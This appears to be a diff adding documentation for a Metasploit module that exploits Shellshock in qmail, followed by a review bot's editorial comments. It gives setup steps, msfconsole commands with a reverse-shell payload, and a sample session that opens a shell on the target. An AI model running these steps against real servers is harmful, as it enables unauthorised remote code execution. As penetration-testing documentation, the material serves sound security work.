| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +Any qmail version (works on latest versions, qmail-1.03 and netqmail-1.06) running on a system with a vulnerable BASH (Shellshock). In order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually [email protected]). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed. |
| 4 | + |
| 5 | +## Setting up a vulnerable environment |
| 6 | + |
| 7 | +Install Qmail on a Linux server with a shellshock vulnerable bash. Ensure that /bin/sh is linked to bash. Create an e-mail account on that qmail server. IMPORTANT: there is a community version of qmail, "qmailrocks" (http://qmailrocks.thibs.com/) which apply a patch that checks the vulnerable MAILFROM parameter. This version (with the patch applied) is NOT vulnerable. If you are using this version, change the "int mfcheck()" function on qmail-smtpd.c and ensure it returns always 0 (after applying the patch) and re-compile qmail-smtpd. |
| 8 | + |
| 9 | +## Verification Steps |
| 10 | + |
| 11 | + 1. `use exploit/unix/smtp/qmail_bash_env_exec` |
| 12 | + 2. `set RHOST <target IP>` |
| 13 | + 3. `set MAILTO <valid e-mail recipient>` |
| 14 | + 4. `set payload cmd/unix/reverse` |
| 15 | + 5. `set LHOST <local IP>` |
| 16 | + 7. optionally set `RPORT` and `LPORT` |
| 17 | + 8. `exploit` |
| 18 | + 9. **Verify** a new shell session is started |
| 19 | + |
| 20 | +## Options |
| 21 | + |
| 22 | +**MAILTO** |
| 23 | + |
| 24 | +A valid e-mail recipient. Usually, [email protected] can be used. |
| 25 | + |
| 26 | +## Sample Output |
| 27 | +**Tested on qmail-1.03 on Debian 6.0.6 (squeeze). BASH version 4.1.5(1).** |
| 28 | + |
| 29 | +``` |
| 30 | +msf > use exploit/unix/smtp/qmail_bash_env_exec |
| 31 | +msf exploit(qmail_bash_env_exec) > set rhost 192.168.1.113 |
| 32 | +rhost => 192.168.1.113 |
| 33 | +msf exploit(qmail_bash_env_exec) > set mailto "[email protected]" |
| 34 | + |
| 35 | +msf exploit(qmail_bash_env_exec) > set payload cmd/unix/reverse |
| 36 | +payload => cmd/unix/reverse |
| 37 | +msf exploit(qmail_bash_env_exec) > show options |
| 38 | +
|
| 39 | +Module options (exploit/unix/smtp/qmail_bash_env_exec): |
| 40 | +
|
| 41 | + Name Current Setting Required Description |
| 42 | + ---- --------------- -------- ----------- |
| 43 | + MAILTO [email protected] yes TO address of the e-mail |
| 44 | + RHOST 192.168.1.113 yes The target address |
| 45 | + RPORT 25 yes The target port (TCP) |
| 46 | +
|
| 47 | +
|
| 48 | +Payload options (cmd/unix/reverse): |
| 49 | +
|
| 50 | + Name Current Setting Required Description |
| 51 | + ---- --------------- -------- ----------- |
| 52 | + LHOST 192.168.1.102 yes The listen address |
| 53 | + LPORT 4444 yes The listen port |
| 54 | +
|
| 55 | +
|
| 56 | +Exploit target: |
| 57 | +
|
| 58 | + Id Name |
| 59 | + -- ---- |
| 60 | + 0 Automatic |
| 61 | +
|
| 62 | +
|
| 63 | +msf exploit(qmail_bash_env_exec) > run |
| 64 | +
|
| 65 | +[*] Started reverse TCP double handler on 192.168.1.102:4444 |
| 66 | +[*] 192.168.1.113:25 - Sending the payload... |
| 67 | +[*] 192.168.1.113:25 - Sending RCPT TO [email protected] |
| 68 | +[*] Accepted the first client connection... |
| 69 | +[*] Accepted the second client connection... |
| 70 | +[*] Command: echo RvZfov9i2ZuveLXA; |
| 71 | +[*] Writing to socket A |
| 72 | +[*] Writing to socket B |
| 73 | +[*] Reading from sockets... |
| 74 | +[*] Reading from socket B |
| 75 | +[*] B: "RvZfov9i2ZuveLXA\r\n" |
| 76 | +[*] Matching... |
| 77 | +[*] A is input... |
| 78 | +[*] Command shell session 19 opened (192.168.1.102:4444 -> 192.168.1.113:48167) at 2017-05-04 15:11:02 +0200 |
| 79 | +
|
| 80 | +whoami |
| 81 | +vpopmail |
| 82 | +``` |
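Review bot: the "/bin/sh has to be linked to bash (usually default configuration)" claim on line 3 contradicts the tested platform on line 27: Debian 6 (squeeze) ships dash as /bin/sh, so the environment section should state explicitly that /bin/sh was relinked to bash for the test, and the "usually default" wording should be dropped or limited to distributions where it actually holds. Lines 3 and 7 name MAILFROM as the injection point but never say how it reaches bash; one sentence explaining that the envelope sender is exported into the environment of the delivery command qmail runs through /bin/sh (which is where Shellshock fires, and why the qmailrocks mfcheck() patch blocks it) would make the mfcheck() workaround on line 7 understandable. Minor items: the verification steps on lines 11 to 18 jump from 5 to 7; "which apply a patch" on line 7 should read "which applies a patch"; the example recipient is rendered as "[email protected]" on lines 3, 24, 33 and 43, which is not a usable example address and should be spelled out as a concrete placeholder; and the `set mailto` command on line 33 is missing its `mailto => ...` echo in the sample output, so the transcript does not match what msfconsole prints.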